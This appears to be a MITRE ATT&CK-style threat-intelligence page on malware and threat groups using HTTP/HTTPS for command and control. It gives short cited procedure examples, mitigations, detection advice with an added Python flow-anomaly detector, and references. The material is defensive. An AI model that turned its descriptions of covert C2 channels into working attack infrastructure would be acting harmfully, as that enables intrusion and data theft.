Micropsia |
Micropsia uses HTTP and HTTPS for C2 network communications.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018) |
FIN8 |
FIN8 has used HTTPS for command and control.(Citation: Bitdefender FIN8 July 2021) |
KGH_SPY |
KGH_SPY can send data to C2 with HTTP POST requests.(Citation: Cybereason Kimsuky November 2020) |
PolyglotDuke |
PolyglotDuke has used HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019) |
Cobalt Strike |
Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: Securelist APT10 March 2021)(Citation: Kaspersky ToddyCat Check Logs October 2023) |
PowerShower |
PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018) |
httpclient |
httpclient uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
ZeroT |
ZeroT has used HTTP for C2.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017) |
Confucius |
Confucius has used HTTP for C2 communications.(Citation: Uptycs Confucius APT Jan 2021) |
Pony |
Pony has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016) |
IPsec Helper |
IPsec Helper connects to command and control servers via HTTP POST requests based on parameters hard-coded into the malware.(Citation: SentinelOne Agrius 2021) |
PowGoop |
PowGoop can send HTTP GET requests to malicious servers.(Citation: CYBERCOM Iranian Intel Cyber January 2022) |
Industroyer |
Industroyer’s main backdoor connected to a remote C2 server using HTTPS.(Citation: ESET Industroyer) |
CosmicDuke |
CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes)(Citation: F-Secure Cosmicduke) |
Carbon |
Carbon can use HTTP in C2 communications.(Citation: Accenture HyperStack October 2020) |
Explosive |
Explosive has used HTTP for communication.(Citation: CheckPoint Volatile Cedar March 2015) |
COATHANGER |
COATHANGER uses an HTTP GET request to initialize a follow-on TLS tunnel for command and control.(Citation: NCSC-NL COATHANGER Feb 2024) |
Kazuar |
Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.(Citation: Unit 42 Kazuar May 2017) |
Windshift |
Windshift has used tools that communicate with C2 over HTTP.(Citation: BlackBerry Bahamut) |
PUNCHBUGGY |
PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019) |
HTTPBrowser |
HTTPBrowser has used HTTP and HTTPS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis) |
Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers.(Citation: Lumen Versa 2024) |
|
RTM |
RTM has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019) |
During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP POST requests.(Citation: Booz Allen Hamilton) |
|
Cobalt Group |
Cobalt Group has used HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017) |
Zeus Panda |
Zeus Panda uses HTTP for C2 communications.(Citation: Talos Zeus Panda Nov 2017) |
GoldMax |
GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) |
OnionDuke |
OnionDuke uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes) |
DarkComet |
DarkComet can use HTTP for C2 communications.(Citation: Malwarebytes DarkComet March 2018) |
Octopus |
Octopus has used HTTP GET and POST requests for C2 communications.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
GeminiDuke |
GeminiDuke uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes) |
GuLoader |
GuLoader can use HTTP to retrieve additional binaries.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021) |
Chaes |
Chaes has used HTTP for C2 communications.(Citation: Cybereason Chaes Nov 2020) |
Turian |
Turian has the ability to use HTTP for its C2.(Citation: ESET BackdoorDiplomacy Jun 2021) |
During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.(Citation: Cybereason OperationCuckooBees May 2022) |
|
During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.(Citation: McAfee Lazarus Jul 2020) |
|
DRATzarus |
DRATzarus can use HTTP or HTTPS for C2 communications.(Citation: ClearSky Lazarus Aug 2020) |
IcedID |
IcedID has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)(Citation: DFIR_Quantum_Ransomware)(Citation: DFIR_Sodinokibi_Ransomware) |
REvil |
REvil has used HTTP and HTTPS in communication with C2.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019) |
Elise |
Elise communicates over HTTP or HTTPS for C2.(Citation: Lotus Blossom Jun 2015) |
down_new |
down_new has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019) |
BLUELIGHT |
BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.(Citation: Volexity InkySquid BLUELIGHT August 2021) |
APT33 |
APT33 has used HTTP for command and control.(Citation: Symantec Elfin Mar 2019) |
TA551 |
TA551 has used HTTP for C2 communications.(Citation: Unit 42 Valak July 2020) |
QUIETCANARY |
QUIETCANARY can use HTTPS for C2 communications.(Citation: Mandiant Suspected Turla Campaign February 2023) |
Egregor |
Egregor has communicated with its C2 servers via HTTPS protocol.(Citation: Intrinsec Egregor Nov 2020) |
VBShower |
VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019) |
IceApple |
IceApple can use HTTP GET to request and pull information from C2.(Citation: CrowdStrike IceApple May 2022) |
Shark |
Shark has the ability to use HTTP in C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021) |
AppleSeed |
AppleSeed has the ability to communicate with C2 over HTTP.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi) |
Gold Dragon |
Gold Dragon uses HTTP for communication to the control servers.(Citation: McAfee Gold Dragon) |
Bazar |
Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: DFIR Conti Bazar Nov 2021) |
BackConfig |
BackConfig has the ability to use HTTPS for C2 communications.(Citation: Unit 42 BackConfig May 2020) |
RedLeaves |
RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018) |
APT29 |
APT29 has used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds) |
Carberp |
Carberp has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010) |
Clambling |
Clambling has the ability to communicate over HTTP.(Citation: Trend Micro DRBControl February 2020) |
RIPTIDE |
APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.(Citation: Moran 2014) |
NOKKI |
NOKKI has used HTTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018) |
Gamaredon Group |
Gamaredon Group has used HTTP and HTTPS for C2 communications.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)(Citation: Unit 42 Gamaredon February 2022)(Citation: unit42_gamaredon_dec2022) |
Manjusaka |
Manjusaka has used HTTP for command and control communication.(Citation: Talos Manjusaka 2022) |
ShadowPad |
ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.(Citation: Kaspersky ShadowPad Aug 2017) |
Sys10 |
Sys10 uses HTTP for C2.(Citation: Baumgartner Naikon 2015) |
During C0018, the threat actors used HTTP for C2 communications.(Citation: Costa AvosLocker May 2022) |
|
MarkiRAT |
MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021) |
OLDBAIT |
OLDBAIT can use HTTP for C2.(Citation: FireEye APT28) |
Ke3chang |
Ke3chang malware, including RoyalCli and BS2005, has communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021) |
Komplex |
The Komplex C2 channel uses HTTP POST requests.(Citation: Sofacy Komplex Trojan) |
Gelsemium |
Gelsemium can use HTTP/S in C2 communications.(Citation: ESET Gelsemium June 2021) |
APT41 DUST used HTTPS for command and control.(Citation: Google Cloud APT41 2024) |
|
FIN4 |
FIN4 has used HTTP POST requests to transmit data.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014) |
SUGARDUMP |
A SUGARDUMP variant has used HTTP for C2.(Citation: Mandiant UNC3890 Aug 2022) |
Cardinal RAT |
Cardinal RAT is downloaded using HTTP over port 443.(Citation: PaloAlto CardinalRat Apr 2017) |
OwaAuth |
OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.(Citation: Dell TG-3390) |
OutSteel |
OutSteel has used HTTP for C2 communications.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022) |
Daserf |
Daserf uses HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017) |
NETWIRE |
NETWIRE has the ability to communicate over HTTP.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020) |
Ninja |
Ninja can use HTTP for C2 communications.(Citation: Kaspersky ToddyCat June 2022) |
DownPaper |
DownPaper communicates to its C2 server over HTTP.(Citation: ClearSky Charming Kitten Dec 2017) |
APT18 |
APT18 uses HTTP for C2 communications.(Citation: PaloAlto DNS Requests May 2016) |
Remsec |
Remsec is capable of using HTTP and HTTPS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis) |
APT39 |
APT39 has used HTTP in communications with C2.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020) |
MiniDuke |
MiniDuke uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019) |
Threat Group-3390 |
Threat Group-3390 malware has used HTTP for C2.(Citation: Securelist LuckyMouse June 2018) |
Get2 |
Get2 has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019) |
Winnti for Windows |
Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.(Citation: Novetta Winnti April 2015) |
HAFNIUM |
HAFNIUM has used open-source C2 frameworks, including Covenant.(Citation: Microsoft HAFNIUM March 2020) |
WIREFIRE |
WIREFIRE can respond to specific HTTP `POST` requests to `/api/v1/cav/client/visits`.(Citation: Mandiant Cutting Edge January 2024)(Citation: Volexity Ivanti Zero-Day Exploitation January 2024) |
STEADYPULSE |
STEADYPULSE can parse web requests made to a targeted server to determine the next stage of execution.(Citation: Mandiant Pulse Secure Zero-Day April 2021) |
Samurai |
Samurai can use a .NET HTTPListener class to receive and handle HTTP POST requests.(Citation: Kaspersky ToddyCat June 2022) |
Lokibot |
Lokibot has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)(Citation: Talos Lokibot Jan 2021) |
Small Sieve |
Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
InvisiMole |
InvisiMole uses HTTP for C2 communications.(Citation: ESET InvisiMole June 2018) |
ShimRatReporter |
ShimRatReporter communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang) |
Grandoreiro |
Grandoreiro has the ability to use HTTP in C2 communications.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020) |
GoldFinder |
GoldFinder has used HTTP for C2.(Citation: MSTIC NOBELIUM Mar 2021) |
Neoichor |
Neoichor can use HTTP for C2 communications.(Citation: Microsoft NICKEL December 2021) |
Cyclops Blink |
Cyclops Blink can download files via HTTP and HTTPS.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022) |
Amadey |
Amadey has used HTTP for C2 communications.(Citation: BlackBerry Amadey 2020) |
TinyTurla |
TinyTurla can use HTTPS in C2 communications.(Citation: Talos TinyTurla September 2021) |
TeamTNT |
TeamTNT has used the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software.(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Cisco Talos Intelligence Group) TeamTNT has also used a custom user agent HTTP header in shell scripts.(Citation: Trend Micro TeamTNT) |
Rocke |
Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019) |
TrickBot |
TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.(Citation: S2 Grupo TrickBot June 2017)(Citation: Cyberreason Anchor December 2019) |
Trojan.Karagany |
Trojan.Karagany can communicate with C2 via HTTP POST requests.(Citation: Secureworks Karagany July 2019) |
VaporRage |
VaporRage can use HTTP to download shellcode from compromised websites.(Citation: MSTIC Nobelium Toolset May 2021) |
SUNBURST |
SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.(Citation: FireEye SUNBURST Backdoor December 2020) |
GrimAgent |
GrimAgent has the ability to use HTTP for C2 communications.(Citation: Group IB GrimAgent July 2021) |
Shamoon |
Shamoon has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016) |
WellMess |
WellMess can use HTTP and HTTPS in C2 communications.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020) |
DealersChoice |
DealersChoice uses HTTP for communication with the C2 server.(Citation: Sofacy DealersChoice) |
Spark |
Spark has used HTTP POST requests to communicate with its C2 server to receive commands.(Citation: Unit42 Molerat Mar 2020) |
ROKRAT |
ROKRAT can use HTTP and HTTPS for command and control communication.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021) |
BlackEnergy |
BlackEnergy communicates with its C2 server over HTTP.(Citation: F-Secure BlackEnergy 2014) |
Sandworm Team |
Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.(Citation: ESET Telebots Dec 2016) |
TA505 |
TA505 has used HTTP to communicate with C2 nodes.(Citation: IBM TA505 April 2020) |
ZLib |
ZLib communicates over HTTP for C2.(Citation: Cylance Dust Storm) |
Bundlore |
Bundlore uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019) |
Sibot |
Sibot communicated with its C2 server via HTTP GET requests.(Citation: MSTIC NOBELIUM Mar 2021) |
FRP |
FRP has the ability to use HTTP and HTTPS to enable the forwarding of requests for internal services via domain name.(Citation: FRP GitHub) |
During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds) |
|
Brute Ratel C4 |
Brute Ratel C4 can use HTTPS for C2 communication.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022) |
DarkTortilla |
DarkTortilla has used HTTP and HTTPS for C2.(Citation: Secureworks DarkTortilla Aug 2022) |
Mitigations |
|
Mitigation | Description |
---|---|
Network Intrusion Prevention |
Use intrusion detection signatures to block traffic at network boundaries. |
Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2) Monitor for web traffic to/from known-bad or suspicious domains.
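The first two checks in the paragraph above (upload-heavy flows and processes with no history of network use) can be sketched as follows. This is an added example, not part of the ATT&CK entry; the record fields, thresholds, baseline and sample flows are all constructed assumptions.

```python
"""Added example: flag web flows that are upload-heavy or come from an unbaselined process."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    host: str       # internal client
    process: str    # process that opened the connection (from host telemetry)
    dest: str       # remote server name
    bytes_out: int  # client -> server
    bytes_in: int   # server -> client


# Constructed baseline: (host, process) pairs that normally talk to the network.
BASELINE = {
    ("ws-01", "chrome.exe"),
    ("ws-01", "outlook.exe"),
    ("ws-02", "chrome.exe"),
}

# Constructed sample flows; destinations use reserved example domains.
FLOWS = [
    Flow("ws-01", "chrome.exe", "news.example.com", 4_000, 900_000),
    Flow("ws-01", "chrome.exe", "news.example.com", 3_500, 750_000),
    Flow("ws-01", "outlook.exe", "mail.example.com", 60_000, 80_000),
    Flow("ws-02", "chrome.exe", "cdn.example.net", 2_000, 300_000),
    Flow("ws-02", "notepad.exe", "files.example.org", 1_200, 2_500),
    Flow("ws-02", "chrome.exe", "upload.example.org", 60_000, 2_000),
    Flow("ws-02", "chrome.exe", "upload.example.org", 60_000, 2_000),
]


def find_suspicious(flows, baseline, ratio_threshold=10.0, min_bytes_out=100_000):
    """Return one finding per (host, process, dest) that trips a check.

    Flows are summed per (host, process, dest) before the ratio test so that
    many small uploads to one server are judged together, not one by one.
    """
    totals = defaultdict(lambda: [0, 0])
    for f in flows:
        key = (f.host, f.process, f.dest)
        totals[key][0] += f.bytes_out
        totals[key][1] += f.bytes_in

    findings = []
    for (host, process, dest), (out_b, in_b) in sorted(totals.items()):
        reasons = []
        ratio = out_b / max(in_b, 1)  # avoid division by zero on one-way flows
        # Client sends significantly more than it receives, and enough to matter.
        if out_b >= min_bytes_out and ratio >= ratio_threshold:
            reasons.append("upload-heavy")
        # Process has no history of network communication on this host.
        if (host, process) not in baseline:
            reasons.append("unbaselined-process")
        if reasons:
            findings.append({
                "host": host,
                "process": process,
                "dest": dest,
                "bytes_out": out_b,
                "bytes_in": in_b,
                "ratio": round(ratio, 1),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(FLOWS, BASELINE):
        print(finding)
```

Both thresholds need tuning against local traffic: legitimate backup and file-sync clients are upload-heavy by design and belong on an allow list rather than under a higher threshold.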
References
- Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
- The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.
- Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
- McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.
- Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.
- Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
- FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
- Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
- Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
- Perez, D. et al. (2021, April 20). Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day. Retrieved February 5, 2024.
- Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.
- NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
- Nakamura, Y. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
- Miller-Osborn, J. and Grunzweig, J. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
- Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
- Kaspersky Lab's Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.
- Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
- Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.
- Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
- Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.
- Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.
- Lin, M. et al. (2024, January 31). Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation. Retrieved February 27, 2024.
- CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
- Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
- Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
- Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
- Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023.
- Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
- Levene, B. et al. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
- Raghuprasad, C. (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.
- Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.
- Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
- Microsoft Threat Intelligence. (2024, May 28). Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks. Retrieved August 26, 2024.
- Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.
- FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
- Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.
- Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
- Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
- Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.
- Bromiley, M., et al. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.
- FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
- Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
- ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.
- Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
- Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019.
- CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.
- Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
- Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.
- US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
- Villadsen, O. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
- Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
- Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.
- Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
- Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.
- Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.
- Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
- Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.
- Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
- FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
- Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.
- Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
- Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.
- F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
- Tom Hegel. (2023, March 16). Winter Vivern | Uncovering a Wave of Global Espionage. Retrieved July 29, 2024.
- CERT-UA. (2023, February 1). UAC-0114 aka Winter Vivern to target Ukrainian and Polish GOV entities (CERT-UA#5909). Retrieved July 29, 2024.
- Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.
- DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.
- Marschalek, M. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
- Ahn Ho, Facundo Muñoz, & Marc-Etienne M.Léveillé. (2024, March 7). Evasive Panda leverages Monlam Festival to target Tibetans. Retrieved July 25, 2024.
- FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
- Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
- Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
- Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
- Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.
- ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
- Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
- Tomonaga, S. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.
- MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.
- Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
- DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.
- DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.
- Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
- Neeamni, D., Rubinfeld, A. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.
- Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
- Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.
- Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.
- Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.
- Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.
- Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021.
